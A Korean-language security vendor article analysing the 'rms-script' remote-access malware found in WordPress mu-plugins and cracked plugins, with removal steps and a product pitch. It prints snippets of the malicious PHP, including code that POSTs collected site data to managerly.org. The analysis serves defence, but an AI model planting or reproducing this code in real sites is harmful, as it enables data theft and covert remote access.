최근에 일부 WordPress 웹사이트에 외부 사이트에 대한 원격 액세스를 제공하는 원격 액세스 멀웨어가 있는 것으로 나타났습니다. 이 악성코드의 위치는 나중에 wp-content/mu-plugins 폴더에서 임의의 PHP 파일로 밝혀졌습니다. 인기 있는 무료 WordPress 보안 플러그인을 사용하여 웹사이트를 스캔했는데도 이상 현상이 감지되지 않았습니다. 이 맬웨어에 대해 자세히 알아보고 수정 방법을 알아보려면 계속 읽으십시오.
rms-script 맬웨어의 기능
처음에는 WordPress 사이트에 이상한 오류가 표시되는 것 같습니다. 이 오류는 원격 액세스 맬웨어로 인해 발생하며 wp-content/mu-plugins 폴더, 특히 아래 그림에서 강조 표시된 의심스러운 PHP 파일로 추적할 수 있습니다.
![[Fix] WordPress rms-script 원격 액세스 멀웨어](/article/uploadfiles/202210/2022103113314740.jpg)
사이트에서 악성코드 검사를 수행한 후에도 원격 액세스 악성코드의 흔적은 없었습니다. 그러나 PHP 파일에 대한 추가 조사에서 코드가 외부 사이트(managerly.org)에 대한 원격 로그인 액세스를 제공하는 것으로 나타났습니다.
여기에서 발견된 완전한 악성 rms-script PHP 코드를 확인할 수 있습니다.
멀웨어 자세히 알아보기
의심스러운 PHP 파일(rms-script-mu-plugin.php 및 rms-script-ini.php)에 대한 참조를 위해 사이트의 플러그인을 검색한 결과, 크랙된 플러그인에 이 악성코드가 있을 수 있음을 발견했습니다. 이 파일의 흔적은 Divi 테마 폴더에서도 발견되었습니다. 이 폴더의 샘플 사이트에는 의 null 버전이 있었습니다. 폴더가 삭제되면 스크립트 실행이 중지되었습니다.
다음은 두 개의 악성 PHP 스크립트가 필요한 크랙 플러그인에서 발견된 코드의 일부입니다.
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);다음은 이전 코드에 이어지는 코드 스니펫입니다.
$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';
$args=
[
'method' => 'POST',
'timeout' => 15,
'redirection' => 15,
'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;이 코드는 자신이 있는 웹사이트에서 데이터를 수집하여 외부 사이트로 보내는 것으로 보입니다. 본질적으로 데이터를 managerly.org 사이트로 보내는 원격 액세스 멀웨어입니다. 이것은 매우 해로울 수 있습니다. 자세한 내용은 다음 섹션에서 설명합니다.
managerly.org에 대한 추가 분석을 통해 다음 정보를 확인할 수 있습니다.
- 등록 기관: Wuxi Yilian LLC
- 등록 시/도: 푸젠성
- 등록 국가: CN
- 네임 서버: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
- DNSSEC: 서명되지 않음
등록 기관의 이름을 검색하면 Reddit 게시물에서도 많은 조회수를 반환합니다. 이 LLC는 가짜이며 다른 사기에도 속합니다. 다음은 몇 가지 검색 결과입니다.
![[Fix] WordPress rms-script 원격 액세스 멀웨어](/article/uploadfiles/202210/2022103113314786.png)
이 맬웨어가 위험한 이유
원격 액세스 맬웨어 공격에서 공격자는 웹 사이트에 액세스하여 악의적인 캠페인에 사용할 수 있습니다. 사이트에 대한 통제권을 잃을 수 있고 민감한 데이터가 공격자에게 노출될 수 있습니다.
여기에서 공격자는 rms-script 원격 액세스 멀웨어를 통해 WordPress 계정을 채굴하려고 합니다! 이 해킹은 비밀번호를 변경하더라도 웹사이트 보안을 우회할 수 있습니다.
주의 사항 - 이 문제는 무료 보안 도구가 이 맬웨어를 탐지할 수 없기 때문에 재발할 가능성이 높습니다. 따라서 의심스러운 파일이 있는지 웹 사이트를 철저히 확인하고 가능한 경우 웹 사이트의 보안을 강화하십시오.
또한 wp-contents/mu-plugins 폴더와 Divi Theme 폴더가 설치되어 있는 경우 악성 PHP 파일이 있는지 확인하십시오.
![[Fix] WordPress rms-script 원격 액세스 멀웨어](/article/uploadfiles/202210/2022103113314858.jpg)
WordPress 사이트를 수정하는 방법
1. 청소하기 전에 사이트를 백업하십시오:
웹 사이트를 오프라인으로 연결하여 청소하는 동안 사용자가 감염된 페이지를 방문하지 않도록 하는 것이 좋습니다. 모든 핵심 파일과 데이터베이스를 백업해야 합니다. .zip과 같은 압축 파일 형식으로 백업해야 합니다.
2. 사이트에서 null 또는 금이 간 플러그인을 제거하십시오.
크랙되거나 무효화된 많은 플러그인 및 테마(특히 Divi 테마)에 이 원격 액세스 맬웨어가 있는 것 같습니다. The WordPress Club의 금이 간 플러그인 및 테마에서 발견되는 이 맬웨어에 대한 세부 정보는 이 스택 오버플로 답변에서 찾을 수 있습니다. 따라서 사이트에서 null 또는 금이 간 플러그인을 제거한 다음 맬웨어 검사를 실행하십시오! 정품 플러그인과 테마만 사용하고 사이트가 취약하지 않도록 계속 업데이트하세요.
3. 모든 의심스러운 폴더 및 파일 삭제:
사이트에서 잠재적으로 악성일 수 있는 파일을 확인하고 삭제하십시오.
관련 가이드 – WordPress 맬웨어 제거
4. 맬웨어 검사 실행:
맬웨어는 계속 진화하고 있지만 맬웨어 스캐너도 마찬가지입니다. 맬웨어 및 악성 파일에 대해 웹 서버에서 맬웨어 검사를 실행하는 것은 항상 좋은 생각입니다. 웹 호스트에서 제공하는 cPanel에서 '바이러스 스캐너' 도구를 사용하거나 Astra Pro Plan으로 전문 악성코드 정리를 받을 수 있습니다. 우리의 멀웨어 스캐너는 악성 PHP 파일에 플래그를 지정합니다!
![[Fix] WordPress rms-script 원격 액세스 멀웨어](/article/uploadfiles/202210/2022103113314804.png)
WordPress wp-content/mu-plugin 원격 액세스 악성코드:결론
원격 액세스 멀웨어는 최근 WordPress 사이트에서 발견되었으며 대부분 nulled 또는 크랙 플러그인을 사용하는 사이트입니다. 이 맬웨어는 널리 사용되는 많은 맬웨어 스캐너에 의해 플래그가 지정되지 않았지만 지속적으로 업데이트되고 있으므로 사이트가 영향을 받을 수 있다고 의심되는 경우 검사를 실행하는 것이 좋습니다. 또한, 정품 플러그인과 테마만 사용하고 업데이트된 상태로 유지하는 것은 사이트를 안전하게 유지하는 좋은 방법입니다.
아스트라 정보
Astra는 해커, 인터넷 위협 및 봇과 싸우는 필수 웹 보안 제품군입니다. WordPress, OpenCart, Magento 등과 같은 인기 있는 CMS를 실행하는 웹사이트에 사전 예방적 보안을 제공합니다. 당사 기술 지원 팀은 연중무휴 24시간 상주하여 해킹 및 맬웨어 감염 상황에 관한 모든 질문에 도움을 드립니다.